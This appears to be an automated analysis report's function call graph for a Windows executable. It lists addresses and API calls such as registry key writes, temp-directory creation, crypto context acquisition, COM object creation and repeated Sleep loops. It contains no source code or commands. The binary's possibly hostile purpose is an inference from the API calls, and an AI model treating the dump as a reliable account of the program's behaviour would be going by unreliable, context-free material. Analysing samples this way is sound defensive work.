ResetEvent 40777->42159 40778->40777 40780 40cfaf 39 API calls 40779->40780 40781 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 40780->40781 40784 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40781->40784 40785 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40784->40785 40786 405a22 40784->40786 40788 4099d7 CatchGuardHandler 5 API calls 40785->40788 40789 40cfaf 39 API calls 40786->40789 40792 409b4a 41 API calls 40787->40792 40790 405a1e 40788->40790 40791 405a27 40789->40791 40790->40610 40794 4107e2 GetSystemTimeAsFileTime 40791->40794 40793 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40792->40793 40793->40779 40801 402730 43 API calls 40793->40801 40806 4092d0 43 API calls 40793->40806 40808 401e20 44 API calls 40793->40808 40813 405682 40793->40813 40815 40fb0d 15 API calls ___std_exception_copy 40793->40815 40818 408c40 43 API calls 40793->40818 40830 403410 41 API calls 40793->40830 40873 405687 40793->40873 42031 4035b0 CryptAcquireContextW 40793->42031 42055 402ec0 40793->42055 42160 409c85 6 API calls 40793->42160 42161 409f97 42 API calls 40793->42161 42162 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40793->42162 40795 405a7f 40794->40795 40796 4106a2 39 API calls 40795->40796 40797 405a88 Sleep 40796->40797 40798 402730 43 API calls 40797->40798 40799 405aba 40798->40799 40802 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40799->40802 42163 4025a0 41 API calls 40799->42163 40801->40793 40803 402730 43 API calls 40802->40803 40851 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40802->40851 40803->40851 40806->40793 40808->40793 40810 403a90 43 API calls 40810->40851 40811 4107b2 43 API calls 40811->40851 40812 409b4a 41 API calls 40812->40851 40814 40577c CoUninitialize 40813->40814 40821 405792 40814->40821 40815->40793 40816 4061c5 40817 406c20 53 API calls 40816->40817 40819 4061ec 40817->40819 40818->40793 40823 402430 43 API calls 40819->40823 40825 4057ae CoUninitialize 40821->40825 40827 4061fc 40823->40827 40837 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40825->40837 40831 402360 39 API calls 40827->40831 40829 4092d0 43 API calls 40829->40851 40830->40793 40832 406210 40831->40832 40835 4062e5 40832->40835 40836 406218 40832->40836 40833 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40834 4099d7 CatchGuardHandler 5 API calls 40833->40834 40838 4058b6 40834->40838 42180 406ec0 53 API calls 2 library calls 40835->42180 40843 406288 40836->40843 40844 40622b 40836->40844 40837->40779 40837->40833 40838->40610 40839 401e20 44 API calls 40839->40851 40840 40cfaf 39 API calls 40840->40851 40842 4062ea 40849 402430 43 API calls 40842->40849 42175 406db0 53 API calls 2 library calls 40843->42175 42170 406ca0 53 API calls 2 library calls 40844->42170 40845 406192 Sleep 40845->40851 40848 40628d 40854 402430 43 API calls 40848->40854 40852 4062fa 40849->40852 40850 406230 40855 402430 43 API calls 40850->40855 40851->40810 40851->40811 40851->40812 40851->40816 40851->40829 40851->40839 40851->40840 40851->40845 40853 402730 43 API calls 40851->40853 40856 40619e 40851->40856 40864 406c0b 40851->40864 40865 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40851->40865 42164 4025a0 41 API calls 40851->42164 42165 409c85 6 API calls 40851->42165 42166 409f97 42 API calls 40851->42166 42167 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40851->42167 40858 402360 39 API calls 40852->40858 40853->40851 40857 40629d 40854->40857 40859 406240 40855->40859 42168 408c10 43 API calls 40856->42168 42176 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40857->42176 40861 40630e 40858->40861 42171 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40859->42171 40867 4063e4 40861->40867 40868 406316 40861->40868 40872 403c20 21 API calls 40864->40872 40865->40845 40866 4062a6 40874 402360 39 API calls 40866->40874 42189 407260 53 API calls 2 library calls 40867->42189 42181 406f40 53 API calls 2 library calls 40868->42181 40869 4061aa 40876 402360 39 API calls 40869->40876 40870 406249 40871 402360 39 API calls 40870->40871 40878 406251 40871->40878 40879 406c10 40872->40879 40880 40571b Sleep 40873->40880 40890 40574a Sleep 40873->40890 42111 100010a3 40873->42111 42114 10001f20 40873->42114 40881 4062ae 40874->40881 40883 4061b2 40876->40883 42172 406d30 53 API calls 2 library calls 40878->42172 40880->40813 40880->40873 42177 406e40 53 API calls 2 library calls 40881->42177 40882 40631b 40894 402430 43 API calls 40882->40894 40887 402360 39 API calls 40883->40887 40884 4063e9 40893 402430 43 API calls 40884->40893 40888 4061ba 40887->40888 42169 4017d0 CoUninitialize 40888->42169 40889 406256 40898 402430 43 API calls 40889->40898 40890->40813 40891 4062b3 40899 402430 43 API calls 40891->40899 40895 4063f9 40893->40895 40896 40632b 40894->40896 40904 402360 39 API calls 40895->40904 42182 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40896->42182 40901 406266 40898->40901 40902 4062c3 40899->40902 40900 406334 40903 402360 39 API calls 40900->40903 42173 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40901->42173 42178 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40902->42178 40908 40633c 40903->40908 40909 40640d 40904->40909 40907 4062cc 40911 402360 39 API calls 40907->40911 42183 406fc0 53 API calls 2 library calls 40908->42183 40913 4064ce 40909->40913 42190 4072e0 53 API calls 2 library calls 40909->42190 40910 40626f 40914 402360 39 API calls 40910->40914 40915 4062d4 40911->40915 42198 407600 53 API calls 2 library calls 40913->42198 40919 406277 40914->40919 42179 408c10 43 API calls 40915->42179 40916 406341 40925 402430 43 API calls 40916->40925 42174 408c10 43 API calls 40919->42174 40921 40641a 40928 402430 43 API calls 40921->40928 40922 4064d8 40929 402430 43 API calls 40922->40929 40924 406283 40926 40686e 40924->40926 42236 402330 43 API calls 40924->42236 40927 406351 40925->40927 40931 401770 41 API calls 40926->40931 42184 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40927->42184 40933 40642a 40928->40933 40934 4064e8 40929->40934 40935 406881 40931->40935 42191 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40933->42191 40942 402360 39 API calls 40934->40942 40939 408380 53 API calls 40935->40939 40936 40635a 40940 402360 39 API calls 40936->40940 40938 406433 40941 402360 39 API calls 40938->40941 40943 40688a 40939->40943 40944 406362 40940->40944 40945 40643b 40941->40945 40946 4064fc 40942->40946 40954 402430 43 API calls 40943->40954 42185 407040 53 API calls 2 library calls 40944->42185 42192 407360 53 API calls 2 library calls 40945->42192 40949 4065e3 40946->40949 42199 407680 53 API calls 2 library calls 40946->42199 42209 407a20 53 API calls 2 library calls 40949->42209 40950 406367 40959 402430 43 API calls 40950->40959 40952 406440 40962 402430 43 API calls 40952->40962 40955 40689d 40954->40955 40958 408300 53 API calls 40955->40958 40956 4065ed 40963 402430 43 API calls 40956->40963 40957 406509 40965 402430 43 API calls 40957->40965 40960 4068a8 40958->40960 40961 406377 40959->40961 40969 402430 43 API calls 40960->40969 40970 402360 39 API calls 40961->40970 40964 406450 40962->40964 40966 4065fd 40963->40966 42193 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40964->42193 40968 406519 40965->40968 40980 402360 39 API calls 40966->40980 42200 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40968->42200 40973 4068bb 40969->40973 40974 40638b 40970->40974 40971 406459 40975 402360 39 API calls 40971->40975 40977 408260 53 API calls 40973->40977 40978 4063ac 40974->40978 40979 40638f 40974->40979 40981 406461 40975->40981 40976 406522 40982 402360 39 API calls 40976->40982 40984 4068c6 40977->40984 42187 407150 53 API calls 2 library calls 40978->42187 42186 4070d0 53 API calls 2 library calls 40979->42186 40986 406611 40980->40986 42194 4073e0 53 API calls 2 library calls 40981->42194 40988 40652a 40982->40988 40998 402430 43 API calls 40984->40998 40991 406693 40986->40991 40992 406615 40986->40992 42201 407700 53 API calls 2 library calls 40988->42201 40989 4063b1 41002 402430 43 API calls 40989->41002 40990 406394 41004 402430 43 API calls 40990->41004 42216 407c40 53 API calls 2 library calls 40991->42216 42210 407ab0 53 API calls 2 library calls 40992->42210 40993 406466 41001 402430 43 API calls 40993->41001 40995 40652f 41006 402430 43 API calls 40995->41006 41003 4068d9 40998->41003 40999 406698 41013 402430 43 API calls 40999->41013 41000 40661a 41010 402430 43 API calls 41000->41010 41005 406476 41001->41005 41007 4063c1 41002->41007 41008 408d60 43 API calls 41003->41008 41009 4063a4 41004->41009 41021 402360 39 API calls 41005->41021 41011 40653f 41006->41011 41023 402360 39 API calls 41007->41023 41012 4068ee 41008->41012 42235 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41009->42235 41015 40662a 41010->41015 42202 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41011->42202 41018 408dc0 43 API calls 41012->41018 41014 4066a8 41013->41014 41032 402360 39 API calls 41014->41032 42211 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41015->42211 41019 406906 41018->41019 41025 408e70 43 API calls 41019->41025 41027 40648a 41021->41027 41022 406548 41028 402360 39 API calls 41022->41028 41029 4063d5 41023->41029 41024 406855 41024->40924 41030 402360 39 API calls 41024->41030 41031 40691b 41025->41031 41026 406633 41033 402360 39 API calls 41026->41033 41034 406498 41027->41034 41035 40648e 41027->41035 41036 406550 41028->41036 41029->40924 42188 4071e0 53 API calls 2 library calls 41029->42188 41030->40924 41037 408dc0 43 API calls 41031->41037 41038 4066bc 41032->41038 41039 40663b 41033->41039 42196 4074f0 53 API calls 2 library calls 41034->42196 42195 407470 53 API calls 2 library calls 41035->42195 42203 407780 53 API calls 2 library calls 41036->42203 41044 406933 41037->41044 41045 4066c0 41038->41045 41046 40673e 41038->41046 42212 407b30 53 API calls 2 library calls 41039->42212 41050 408e70 43 API calls 41044->41050 42217 407cd0 53 API calls 2 library calls 41045->42217 42223 407e50 53 API calls 2 library calls 41046->42223 41048 406555 41058 402430 43 API calls 41048->41058 41049 40649d 41059 402430 43 API calls 41049->41059 41054 406948 41050->41054 41053 406640 41062 402430 43 API calls 41053->41062 41057 408dc0 43 API calls 41054->41057 41055 406743 41065 402430 43 API calls 41055->41065 41056 4066c5 41066 402430 43 API calls 41056->41066 41061 406960 41057->41061 41063 406565 41058->41063 41060 4064ad 41059->41060 41075 402360 39 API calls 41060->41075 41064 402360 39 API calls 41061->41064 41067 406650 41062->41067 42204 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41063->42204 41070 40696e 41064->41070 41071 406753 41065->41071 41072 4066d5 41066->41072 42213 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41067->42213 41069 40656e 41074 402360 39 API calls 41069->41074 41076 402360 39 API calls 41070->41076 41086 402360 39 API calls 41071->41086 42218 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41072->42218 41079 406576 41074->41079 41080 4064c1 41075->41080 41081 406979 41076->41081 41078 406659 41083 402360 39 API calls 41078->41083 42205 407800 53 API calls 2 library calls 41079->42205 41080->40924 42197 407580 53 API calls 2 library calls 41080->42197 41085 402360 39 API calls 41081->41085 41082 4066de 41087 402360 39 API calls 41082->41087 41088 406661 41083->41088 41092 406984 41085->41092 41093 406767 41086->41093 41094 4066e6 41087->41094 42214 407bc0 53 API calls 2 library calls 41088->42214 41090 40657b 41106 402430 43 API calls 41090->41106 41097 402360 39 API calls 41092->41097 41098 40676b 41093->41098 41099 4067be 41093->41099 42219 407d50 53 API calls 2 library calls 41094->42219 41096 406666 41109 402430 43 API calls 41096->41109 41100 40698f 41097->41100 42224 407ee0 53 API calls 2 library calls 41098->42224 42229 408060 53 API calls 2 library calls 41099->42229 41104 402360 39 API calls 41100->41104 41102 4066eb 41112 402430 43 API calls 41102->41112 41108 40699a 41104->41108 41105 406770 41115 402430 43 API calls 41105->41115 41110 40658b 41106->41110 41107 4067c3 41118 402430 43 API calls 41107->41118 41111 402360 39 API calls 41108->41111 41113 406676 41109->41113 41123 402360 39 API calls 41110->41123 41114 4069a5 41111->41114 41116 4066fb 41112->41116 42215 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41113->42215 41119 402360 39 API calls 41114->41119 41120 406780 41115->41120 42220 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41116->42220 41124 4067d3 41118->41124 41125 4069b0 41119->41125 42225 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41120->42225 41122 40667f 41128 402360 39 API calls 41122->41128 41129 40659f 41123->41129 41138 402360 39 API calls 41124->41138 41130 402360 39 API calls 41125->41130 41127 406704 41132 402360 39 API calls 41127->41132 41128->40924 41133 4065a8 41129->41133 42206 407890 53 API calls 2 library calls 41129->42206 41173 4069bf 41130->41173 41131 406789 41135 402360 39 API calls 41131->41135 41136 40670c 41132->41136 42207 407910 53 API calls 2 library calls 41133->42207 41141 406791 41135->41141 42221 407dd0 53 API calls 2 library calls 41136->42221 41139 4067e7 41138->41139 41139->40924 42230 4080e0 53 API calls 2 library calls 41139->42230 41140 4065b2 41148 402430 43 API calls 41140->41148 42226 407f60 53 API calls 2 library calls 41141->42226 41144 406711 41150 402430 43 API calls 41144->41150 41146 406796 41152 402430 43 API calls 41146->41152 41147 4067f0 41155 402430 43 API calls 41147->41155 41149 4065c2 41148->41149 41160 402360 39 API calls 41149->41160 41153 406721 41150->41153 41151 406a1e Sleep 41151->41173 41156 4067a6 41152->41156 42222 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41153->42222 41159 406800 41155->41159 42227 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41156->42227 41158 40672a 41163 402360 39 API calls 41158->41163 42231 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41159->42231 41165 4065d6 41160->41165 41161 402430 43 API calls 41161->41173 41162 4067af 41166 402360 39 API calls 41162->41166 41163->40924 41165->40924 42208 4079a0 53 API calls 2 library calls 41165->42208 41168 4067b7 41166->41168 41167 406809 41169 402360 39 API calls 41167->41169 42228 407fe0 53 API calls 2 library calls 41168->42228 41172 406811 41169->41172 42232 408160 53 API calls 2 library calls 41172->42232 41173->41151 41173->41161 41174 406a27 41173->41174 41179 406a16 41173->41179 41176 402360 39 API calls 41174->41176 41178 406a2f 41176->41178 41177 406816 41182 402430 43 API calls 41177->41182 41181 408c40 43 API calls 41178->41181 41183 402360 39 API calls 41179->41183 41180 4067bc 41184 402430 43 API calls 41180->41184 41185 406a40 41181->41185 41187 406826 41182->41187 41183->41151 41184->41009 41186 408c40 43 API calls 41185->41186 41188 406a59 41186->41188 42233 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41187->42233 41190 408c40 43 API calls 41188->41190 41192 406a6c 41190->41192 41191 40682f 41193 402360 39 API calls 41191->41193 41195 406837 41193->41195 42234 4081e0 53 API calls 2 library calls 41195->42234 41249 40b530 CallUnexpected 41248->41249 41250 403d7b GetTempPathA 41249->41250 41251 403db7 41250->41251 41251->41251 41252 402730 43 API calls 41251->41252 41261 403dd3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41252->41261 41255 4092d0 43 API calls 41255->41261 41256 403f02 CreateDirectoryA Sleep 41257 403f30 CallUnexpected 41256->41257 41256->41261 41262 409b4a 41 API calls 41257->41262 41258 404f20 41259 40cfaf 39 API calls 41258->41259 41260 404f43 41259->41260 41263 4107e2 GetSystemTimeAsFileTime 41260->41263 41261->41255 41261->41256 41261->41258 42524 410681 41261->42524 42527 403c30 41261->42527 41267 403f64 CallUnexpected 41262->41267 41264 404f9f 41263->41264 41265 4106a2 39 API calls 41264->41265 41266 404fa8 CallUnexpected 41265->41266 41270 409b4a 41 API calls 41266->41270 41271 40402b 41267->41271 42542 409c85 6 API calls 41267->42542 41269 403fe2 41269->41271 42543 409f97 42 API calls 41269->42543 41297 404ffc CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41270->41297 41273 402730 43 API calls 41271->41273 41275 4040a2 41273->41275 41274 40401e 42544 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41274->42544 41277 4092d0 43 API calls 41275->41277 41278 4040cd 41277->41278 41278->41258 41279 404147 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41278->41279 41284 404207 41279->41284 42545 409c85 6 API calls 41279->42545 41282 4041b1 41282->41284 42546 409f97 42 API calls 41282->42546 41283 402730 43 API calls 41283->41297 41286 402730 43 API calls 41284->41286 41289 404262 41286->41289 41288 4092d0 43 API calls 41288->41297 41292 4092d0 43 API calls 41289->41292 41290 4041fa 42547 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41290->42547 41294 404281 41292->41294 41296 401e20 44 API calls 41294->41296 41295 401e20 44 API calls 41295->41297 41304 404312 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41296->41304 41297->41283 41297->41288 41297->41295 41298 4052d0 Sleep 41297->41298 41299 4058bd 41297->41299 41305 402470 43 API calls 41297->41305 41311 4052e0 CallUnexpected 41297->41311 42561 409c85 6 API calls 41297->42561 42562 409f97 42 API calls 41297->42562 42563 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41297->42563 41298->41297 41300 40cfaf 39 API calls 41299->41300 41302 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 41300->41302 41301 4043e7 CallUnexpected 41306 409b4a 41 API calls 41301->41306 41307 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41302->41307 41304->41301 42533 4021f0 41304->42533 41305->41297 41314 40441b CallUnexpected 41306->41314 41309 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41307->41309 41310 405a22 41307->41310 41312 4099d7 CatchGuardHandler 5 API calls 41309->41312 41313 40cfaf 39 API calls 41310->41313 41317 409b4a 41 API calls 41311->41317 41315 405a1e 41312->41315 41316 405a27 41313->41316 41321 4044fc 41314->41321 42548 409c85 6 API calls 41314->42548 41315->40612 41320 4107e2 GetSystemTimeAsFileTime 41316->41320 41381 405315 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41317->41381 41319 4044a6 41319->41321 42549 409f97 42 API calls 41319->42549 41322 405a7f 41320->41322 41324 402730 43 API calls 41321->41324 41323 4106a2 39 API calls 41322->41323 41326 405a88 Sleep 41323->41326 41327 40455d 41324->41327 41329 402730 43 API calls 41326->41329 41330 4092d0 43 API calls 41327->41330 41328 4044ef 42550 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41328->42550 41354 405aba 41329->41354 41334 404588 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41330->41334 41333 402730 43 API calls 41333->41381 41343 4046c2 41334->41343 42551 409c85 6 API calls 41334->42551 41335 402730 43 API calls 41419 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41335->41419 41338 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41338->41335 41338->41419 41339 40466c 41339->41343 42552 409f97 42 API calls 41339->42552 41341 4092d0 43 API calls 41341->41381 41342 40cfaf 39 API calls 41342->41419 41346 402730 43 API calls 41343->41346 41348 40471d 41346->41348 41347 4046b5 42553 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41347->42553 41350 4092d0 43 API calls 41348->41350 41352 40473c 41350->41352 41351 401e20 44 API calls 41351->41381 41356 401e20 44 API calls 41352->41356 41354->41338 42567 4025a0 41 API calls 41354->42567 41355 403a90 43 API calls 41355->41419 41358 4047cd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41356->41358 41357 4107b2 43 API calls 41357->41419 41361 4021f0 8 API calls 41358->41361 41362 404d05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41358->41362 41359 409b4a 41 API calls 41359->41419 41360 405682 41363 40577c CoUninitialize 41360->41363 41364 4048b8 SHGetFolderPathA 41361->41364 41369 404dc1 CoUninitialize 41362->41369 41374 405792 41363->41374 41364->41362 41367 4048d5 41364->41367 41365 4061c5 41368 406c20 53 API calls 41365->41368 41366 40fb0d 15 API calls ___std_exception_copy 41366->41381 41379 40495a 41367->41379 42554 409c85 6 API calls 41367->42554 41370 4061ec 41368->41370 41387 404dd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41369->41387 41377 402430 43 API calls 41370->41377 41372 408c40 43 API calls 41372->41381 41382 4057ae CoUninitialize 41374->41382 41375 404911 41375->41379 42555 409f97 42 API calls 41375->42555 41376 4035b0 52 API calls 41376->41381 41384 4061fc 41377->41384 41385 402730 43 API calls 41379->41385 41380 402730 43 API calls 41380->41419 41381->41299 41381->41333 41381->41341 41381->41351 41381->41360 41381->41366 41381->41372 41381->41376 41386 402ec0 93 API calls 41381->41386 41403 403410 41 API calls 41381->41403 41449 405687 41381->41449 42564 409c85 6 API calls 41381->42564 42565 409f97 42 API calls 41381->42565 42566 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41381->42566 41401 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41382->41401 41393 402360 39 API calls 41384->41393 41396 4049bd 41385->41396 41386->41381 41392 404e42 CoUninitialize 41387->41392 41388 40494d 42556 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41388->42556 41390 4092d0 43 API calls 41390->41419 41414 404e52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41392->41414 41394 406210 41393->41394 41399 4062e5 41394->41399 41400 406218 41394->41400 41395 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41397 4099d7 CatchGuardHandler 5 API calls 41395->41397 41406 4049f1 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41396->41406 42557 409590 43 API calls 4 library calls 41396->42557 41402 4058b6 41397->41402 42584 406ec0 53 API calls 2 library calls 41399->42584 41412 406288 41400->41412 41413 40622b 41400->41413 41401->41299 41401->41395 41402->40612 41403->41381 41404 401e20 44 API calls 41404->41419 41411 404bc3 CoInitialize CoCreateInstance 41406->41411 42558 409c85 6 API calls 41406->42558 41407 4062ea 41422 402430 43 API calls 41407->41422 41408 4099d7 CatchGuardHandler 5 API calls 41409 404f19 41408->41409 41409->40612 41410 406192 Sleep 41410->41419 41411->41362 41438 404c68 41411->41438 42579 406db0 53 API calls 2 library calls 41412->42579 42574 406ca0 53 API calls 2 library calls 41413->42574 41414->41408 41419->41342 41419->41355 41419->41357 41419->41359 41419->41365 41419->41380 41419->41390 41419->41404 41419->41410 41429 40619e 41419->41429 41439 406c0b 41419->41439 41440 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41419->41440 42568 4025a0 41 API calls 41419->42568 42569 409c85 6 API calls 41419->42569 42570 409f97 42 API calls 41419->42570 42571 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41419->42571 41420 40628d 41426 402430 43 API calls 41420->41426 41421 404b87 41421->41411 42559 409f97 42 API calls 41421->42559 41424 4062fa 41422->41424 41423 406230 41428 402430 43 API calls 41423->41428 41432 402360 39 API calls 41424->41432 41430 40629d 41426->41430 41427 404bb6 42560 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 41427->42560 41433 406240 41428->41433 42572 408c10 43 API calls 41429->42572 42580 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41430->42580 41435 40630e 41432->41435 42575 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41433->42575 41442 4063e4 41435->41442 41443 406316 41435->41443 41461 404cb5 MultiByteToWideChar 41438->41461 41462 404ce3 CoUninitialize 41438->41462 41447 403c20 21 API calls 41439->41447 41440->41410 41441 4062a6 41450 402360 39 API calls 41441->41450 42593 407260 53 API calls 2 library calls 41442->42593 42585 406f40 53 API calls 2 library calls 41443->42585 41444 4061aa 41452 402360 39 API calls 41444->41452 41445 406249 41446 402360 39 API calls 41445->41446 41453 406251 41446->41453 41454 406c10 41447->41454 41456 40571b Sleep 41449->41456 41467 40574a Sleep 41449->41467 41824 10001f20 70 API calls 41449->41824 41825 100010a3 CoUninitialize 41449->41825 41457 4062ae 41450->41457 41459 4061b2 41452->41459 42576 406d30 53 API calls 2 library calls 41453->42576 41455 4063e9 41471 402430 43 API calls 41455->41471 41456->41360 41456->41449 42581 406e40 53 API calls 2 library calls 41457->42581 41458 40631b 41472 402430 43 API calls 41458->41472 41464 402360 39 API calls 41459->41464 41461->41462 41462->41362 41465 4061ba 41464->41465 42573 4017d0 CoUninitialize 41465->42573 41466 406256 41476 402430 43 API calls 41466->41476 41467->41360 41468 4062b3 41477 402430 43 API calls 41468->41477 41473 4063f9 41471->41473 41474 40632b 41472->41474 41483 402360 39 API calls 41473->41483 42586 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41474->42586 41479 406266 41476->41479 41480 4062c3 41477->41480 41478 406334 41481 402360 39 API calls 41478->41481 42577 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41479->42577 42582 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41480->42582 41486 40633c 41481->41486 41488 40640d 41483->41488 41485 4062cc 41489 402360 39 API calls 41485->41489 42587 406fc0 53 API calls 2 library calls 41486->42587 41487 40626f 41491 402360 39 API calls 41487->41491 41669 4064ce 41488->41669 42594 4072e0 53 API calls 2 library calls 41488->42594 41492 4062d4 41489->41492 41495 406277 41491->41495 42583 408c10 43 API calls 41492->42583 41493 406341 41501 402430 43 API calls 41493->41501 42578 408c10 43 API calls 41495->42578 41498 4064d8 41504 402430 43 API calls 41498->41504 41500 40641a 41505 402430 43 API calls 41500->41505 41503 406351 41501->41503 41502 40686e 41507 401770 41 API calls 41502->41507 42588 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41503->42588 41509 4064e8 41504->41509 41510 40642a 41505->41510 41511 406881 41507->41511 41520 402360 39 API calls 41509->41520 42595 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41510->42595 41515 408380 53 API calls 41511->41515 41512 40635a 41516 402360 39 API calls 41512->41516 41514 406433 41517 402360 39 API calls 41514->41517 41518 40688a 41515->41518 41519 406362 41516->41519 41521 40643b 41517->41521 41527 402430 43 API calls 41518->41527 42589 407040 53 API calls 2 library calls 41519->42589 41523 4064fc 41520->41523 42596 407360 53 API calls 2 library calls 41521->42596 41748 4065e3 41523->41748 42603 407680 53 API calls 2 library calls 41523->42603 41525 406367 41534 402430 43 API calls 41525->41534 41526 406440 41535 402430 43 API calls 41526->41535 41530 40689d 41527->41530 41533 408300 53 API calls 41530->41533 41531 4065ed 41539 402430 43 API calls 41531->41539 41532 406509 41540 402430 43 API calls 41532->41540 41536 4068a8 41533->41536 41537 406377 41534->41537 41538 406450 41535->41538 41545 402430 43 API calls 41536->41545 41546 402360 39 API calls 41537->41546 42597 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41538->42597 41542 4065fd 41539->41542 41543 406519 41540->41543 41556 402360 39 API calls 41542->41556 42604 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41543->42604 41544 406459 41548 402360 39 API calls 41544->41548 41549 4068bb 41545->41549 41550 40638b 41546->41550 41552 406461 41548->41552 41553 408260 53 API calls 41549->41553 41554 4063ac 41550->41554 41555 40638f 41550->41555 41551 406522 41557 402360 39 API calls 41551->41557 42598 4073e0 53 API calls 2 library calls 41552->42598 41560 4068c6 41553->41560 42591 407150 53 API calls 2 library calls 41554->42591 42590 4070d0 53 API calls 2 library calls 41555->42590 41562 406611 41556->41562 41563 40652a 41557->41563 41573 402430 43 API calls 41560->41573 41567 406693 41562->41567 41568 406615 41562->41568 42605 407700 53 API calls 2 library calls 41563->42605 41564 4063b1 41576 402430 43 API calls 41564->41576 41565 406466 41577 402430 43 API calls 41565->41577 41566 406394 41579 402430 43 API calls 41566->41579 42620 407c40 53 API calls 2 library calls 41567->42620 42614 407ab0 53 API calls 2 library calls 41568->42614 41570 40652f 41580 402430 43 API calls 41570->41580 41578 4068d9 41573->41578 41574 406698 41587 402430 43 API calls 41574->41587 41575 40661a 41584 402430 43 API calls 41575->41584 41581 4063c1 41576->41581 41582 406476 41577->41582 41583 408d60 43 API calls 41578->41583 41764 4063a4 41579->41764 41585 40653f 41580->41585 41596 402360 39 API calls 41581->41596 41598 402360 39 API calls 41582->41598 41586 4068ee 41583->41586 41589 40662a 41584->41589 42606 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 41585->42606 41592 408dc0 43 API calls 41586->41592 41588 4066a8 41587->41588 41606 402360 39 API calls 